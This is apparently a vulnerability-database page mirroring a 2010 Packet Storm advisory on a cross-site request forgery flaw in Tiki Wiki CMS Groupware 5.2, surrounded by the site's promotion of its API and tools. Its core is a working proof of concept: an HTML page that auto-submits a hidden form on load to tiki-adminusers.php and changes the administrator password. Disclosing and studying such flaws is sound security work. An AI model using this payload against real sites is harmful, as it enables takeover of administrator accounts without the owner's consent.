Lucene search
+L

Tiki Wiki CMS Groupware 5.2 Cross Site Request Forgery

🗓️ 25 Sep 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Tiki Wiki CMS Groupware 5.2 Cross-Site Request Forgery vulnerability allows admin password chang

Code
`<!------------------------------------------------------------------------  
# Software................Tiki Wiki CMS Groupware 5.2  
# Vulnerability...........Cross-site Request Forgery  
# Download................htp://www.tiki.org  
# Release Date............9/24/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://www.johnleitch.net/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in Tiki Wiki CMS Groupware  
# 5.2 can be exploited to change the admin password.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit.click()">  
<form method="POST" action="http://localhost/tiki-5.2/tiki-adminusers.php">  
<input type="hidden" name="name" value="admin" />  
<input type="hidden" name="pass" value="Password2" />  
<input type="hidden" name="pass2" value="Password2" />  
<input type="hidden" name="genepass" value="" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="user" value="1" />  
<input type="hidden" name="edituser" value="1" />   
<input type="submit" name="submit" value="Save" />   
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Sep 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
22